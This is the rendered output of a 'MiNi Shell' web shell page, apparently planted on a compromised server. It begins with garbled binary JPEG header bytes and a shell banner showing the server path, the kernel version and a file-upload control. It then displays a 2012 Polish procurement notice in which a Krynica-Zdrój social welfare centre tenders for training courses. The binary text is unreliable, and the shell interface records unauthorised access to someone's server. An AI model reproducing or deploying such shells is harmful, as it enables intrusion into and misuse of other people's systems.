JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120314/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120314/79348-N-2012.html

<p class="kh_header"><b>Krynica-Zdrój: Przeprowadzenie szkoleń dla 19 Beneficjentów Ostatecznych 
projektu Czas na zwiększenie aktywności zawodowej 
w Gminie Krynica - Zdrój
Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
Priorytet VII Promocja integracji społecznej
Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji
Podziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 79348 - 2012; data zamieszczenia: 14.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Krynicy-Zdroju , ul. Kraszewskiego 37, 33-380 Krynica-Zdrój, woj. małopolskie, tel. 18 471 53 68, faks 18 471 0 771.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opskrynica.ovh.org/index.html</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla 19 Beneficjentów Ostatecznych 
projektu Czas na zwiększenie aktywności zawodowej 
w Gminie Krynica - Zdrój
Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
Priorytet VII Promocja integracji społecznej
Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji
Podziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu szkoleń dla 19 Beneficjantów Ostatecznych       projektu Czas na zwiększenie aktywności zawodowej w Gminie Krynica - Zdrój. Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Podziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.	
Zakres zamówienia obejmuje przeprowadzenie szkoleń w ramach działania aktywnej integracji. Uczestnikami szkoleń będą osoby zameldowane na terenie Gminy Krynica - Zdrój, zagrożone wykluczeniem społecznym z powodu ubóstwa materialnego - biedy, bezrobocia, niskich kwalifikacjach zawodowych i braku wykształcenia, które są jednocześnie w wieku aktywności zawodowej (15-64 lat) oraz korzystających ze świadczeń pomocy społecznej w rozumieniu przepisów o pomocy społecznej. 
Wykonawca w ramach realizacji przedmiotowego zamówienia winien:
1) przeprowadzić szkolenia w ramach 3 modułów tematycznych, w tym: 
a)	blok psychologiczny - szkolenie podstawowe, o tematyce: PODNOSZENIE WŁASNEJ KREATYWNOŚCI, ZARZĄDZANIE CZASEM, WYSZKOLENIE DO PRACY              W TELEMARKETINGU, KSZTAŁCENIE ZDOLNOŚCI PRZYWÓDCZYCH. 
Zakres szkolenia obejmuje tematykę, która pozwoli na przezwyciężenie indywidualnych barier w powrocie na rynek pracy. Szkolenie to ma aspekt praktyczny, główny nacisk należy położyć na ukształtowanie umiejętności komunikacji interpersonalnej                         i asertywności Uczestników szkolenia. Ukończenie szkolenia pozwoli na podniesienie własnej wartości Beneficjentów Ostatecznych, da również podstawy do efektywnego poszukiwania pracy w swoim zawodzie. Zajęcia odbywać się będą w dwóch grupach (10      i 9 - osobowej). Szkolenie obejmuje 32 godziny (zegarowe) zajęć wykładowych i ćwiczeń dla każdej grupy. Łączna ilość godzin dla dwóch grup wyniesie 64 godziny (zegarowe)      - czas trwania: 8 godzin (zegarowych) raz w tygodniu (czyli 4 razy w miesiącu). 
Ponadto wszyscy Uczestnicy szkolenia otrzymają wsparcie psychologiczne poprzez indywidualne konsultacje obejmujące trzy spotkania po jednej godzinie zegarowej dla każdego Uczestnika (19 osób - 3 godziny, łącznie 57 godzin zegarowych). Termin realizacji szkolenia psychologicznego od dnia podpisania umowy do 30.04.2012 r.
b)	doradztwo zawodowe - indywidualne konsultacje. W ramach aktywizacji zawodowej każdy z Uczestników odbędzie indywidualne konsultacje z trenerem - doradztwo zawodowe. Doradca zawodowy przeprowadzi diagnozę wśród Uczestników szkolenia kwalifikując ich na poszczególne kursy zawodowe. Indywidualne konsultacje będą obejmować jedną godzinę zegarową dla każdego Uczestnika (19 osób - 1 godzina, łącznie 19 godzin zegarowych). Termin indywidualnych konsultacji z doradcą zawodowym od dnia podpisania umowy do 30 04.2012 r.
c)	kurs języka angielskiego na poziomie podstawowym. Dopuszcza się możliwość zmiany poziomu lub innej konfiguracji nauczania ze względu na poziom znajomości języka angielskiego przez Uczestników kursu. Wobec tego Wykonawca jest zobowiązany do przeprowadzenia testu z j. angielskiego kwalifikującego Uczestników Projektu na dany poziom (podstawowy lub zaawansowany). Zajęcia odbywać się będą w dwóch grupach (10 i 9 - osobowej). Szkolenie obejmuje 96 godzin języka angielskiego. Łączna ilość godzin dla dwóch grup wyniesie 192 godzin lekcyjnych - czas trwania: 2 godziny dwa razy           w tygodniu (czyli 8 razy w miesiącu). Okres realizacji: I semestr od 01.05.2012 r. do 31.07.2012 r. (przerwa w sierpniu) oraz drugi semestr od 03.09.2012 r. do 30.11.2012 r.
2)	przeprowadzić zajęcia szkoleniowe na terenie miasta Krynica - Zdrój w max. odległości do 2 km od Ośrodka Pomocy Społecznej w Krynicy - Zdroju, w salach odpowiednich dla przewidywanej ilości osób, przystosowanych do przeprowadzania zajęć w pełni wyposażonych w akcesoria do ich przeprowadzenia (tj. tablica papierowa, pisaki itd.); 
3)	przeprowadzić zajęcia szkoleniowe w godzinach dostosowanych do możliwości Uczestników, celem wyrównania szans uczestnictwa w szkoleniach pod względem płci;
4)	oznakować pomieszczenia, w których będą odbywać się zajęcia szkoleniowe materiałami promocyjnymi projektu Czas na zwiększenie aktywności zawodowej w Gminie Krynica        - Zdrój, a także informacjami o współfinansowaniu ze środków Unii Europejskiej                     w ramach Europejskiego Funduszu Społecznego wraz z logotypami Programu Operacyjnego Kapitał Ludzki;
5)	zapewnić i przekazać każdemu Uczestnikowi szkolenia materiały dydaktyczne w tym m. in.: notatniki, przyrządy do pisania, markery, podręczniki do nauki języka angielskiego, przy czym materiały muszą zawierać informację, że projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz posiadać logotypy Programu Operacyjnego Kapitał Ludzki;
6)	przedstawić Zamawiającemu do akceptacji szczegółowy Harmonogram szkoleń z podaniem daty, miejsca i czasu realizacji oraz tematyki szkoleń w terminie do trzech dni roboczych od dnia podpisania umowy; 
7)	przekazać uprzednio uzgodniony i zaakceptowany przez Zamawiającego harmonogram zajęć każdemu Uczestnikowi szkolenia;
8)	zapewnić tzw. mały catering i obsługę cateringową na każdych zajęciach szkoleniowych, dla każdej grupy: obejmującego kawę ze śmietanką, herbatę, cukier, 2 l soku owocowego,              1 opakowanie paluszków, 1 wodę mineralną gazowaną 1,5 l, różne rodzaje owoców, mieszankę ciastek, jednorazowe kubki oraz środki czystości tj. mydło w płynie, ręczniki papierowe, papier toaletowy;
9)	przygotować i wydać na każdych 8 godzinnych zajęciach szkoleniowych, dwudaniowy ciepły posiłek w formie obiadu (zupa + drugie danie) wraz z deserem w trakcie przerwy                   w godzinach południowych;
10)	przygotować i sprawdzać listy obecności Uczestników podczas szkoleń przy rozpoczęciu zajęć, każdego dnia oraz niezwłocznie zawiadomić Zamawiającego w przypadku stwierdzenia nieobecności któregokolwiek z uczestników figurującego na liście; 
11)	wystawić i przekazać Zamawiającemu nie później niż na 3 dni przed uroczystym zakończeniem projektu odpowiednich opinii, zaświadczeń, certyfikatów, w formie papierowej, o ukończeniu szkolenia, przez danego Uczestnika (z tym, że w przypadku kursu j. angielskiego Wykonawca wystawi odpowiedni dokument po każdym semestrze). Każdy wydany dokument winien zawierać informację, że projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz zawierać logotypy Programu Operacyjnego Kapitał Ludzki;
12)	zapewnić kadrę dydaktyczną posiadającą kwalifikacje niezbędne do realizacji poszczególnych szkoleń. W sytuacji, gdy wskazane w ofercie osoby nie będą mogły przeprowadzić poszczególnych szkoleń, Wykonawca zobowiązany jest natychmiast zapewnić inne osoby do realizacji zamówienia, o wiedzy i kwalifikacjach nie niższych, niż dotychczas wskazane osoby. Osoby sprawujące zastępstwo winny być uprzednio zaakceptowane przez Zamawiającego. Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia beneficjentów - na każdym jego etapie;
13)	przekazać Zamawiającemu po wykonaniu przedmiotu zamówienia: oryginalne listy obecności Uczestników, oryginalne dzienniki z prowadzonych zajęć, jeden egzemplarz materiałów przekazywanych Uczestnikowi z każdego modułu tematycznego szkolenia, opinię na temat każdego Uczestnika z poszczególnych szkoleń, opinię na temat każdego Uczestnika po zakończeniu pierwszego i drugiego semestru z j. angielskiego, opinię końcową na temat każdego Uczestnika, raport końcowy obejmujący zarówno całość grupy jak i poszczególnych beneficjentów, zaświadczenie o ukończeniu zajęć. Ponadto przeprowadzić i przekazać Zamawiającemu oryginalne ankiety porównawcze (ewaluacyjne) dostosowane do realizowanych przez Ośrodek Pomocy Społecznej w Krynicy - Zdroju rezultatów przed i po zakończeniu projektu oraz ich opracowanie;
14)	 współpracować z Zamawiającym w zakresie realizacji przedmiotu zamówienia, w tym przedstawić na każde żądanie Zamawiającego w trakcie realizacji szkoleń (do wglądu) dzienniki zajęć oraz listy obecności Uczestników szkolenia oraz uwzględniać wszelkie uwagi i wskazówki Zamawiającego w zakresie realizacji przedmiotu zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje:
1.	co najmniej 1 osobą, która posiada wykształcenie wyższe na kierunku psychologia,  która będzie uczestniczyć w wykonywaniu zamówienia,
2.	co najmniej 1 osobą, która posiada wykształcenie wyższe na kierunku filologia lub lingwistyka stosowana w zakresie języka angielskiego, która będzie uczestniczyć          w wykonywaniu zamówienia,
3.	co najmniej 1 osobą, która posiada wykształcenie wyższe o specjalności doradca zawodowy lub wykształcenie wyższe i studia podyplomowe w zakresie doradztwa zawodowego, która będzie uczestniczyć w wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
1)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy;
2)	konieczności zmiany terminu realizacji zamówienia na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę lub Zamawiającego;
3)	zmiany osób przewidzianych do realizacji zamówienia, zgodnie z § 4 ust. 1 pkt 10 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opskrynica.ovh.org/index.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Krynicy - Zdroju
ul. Kraszewskiego 37
33-380 Krynica - Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2012 godzina 08:30, miejsce: Ośrodek Pomocy Społecznej w Krynicy - Zdroju
ul. Kraszewskiego 37
33-380 Krynica - Zdrój 
pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Czas na zwiększenie aktywności zawodowej w Gminie Krynica-Zdrój
Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
Priorytet VII Promocja integracji społecznej 
Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji
Podziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Zamawiający nie przewiduje zawarcia umowy ramowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com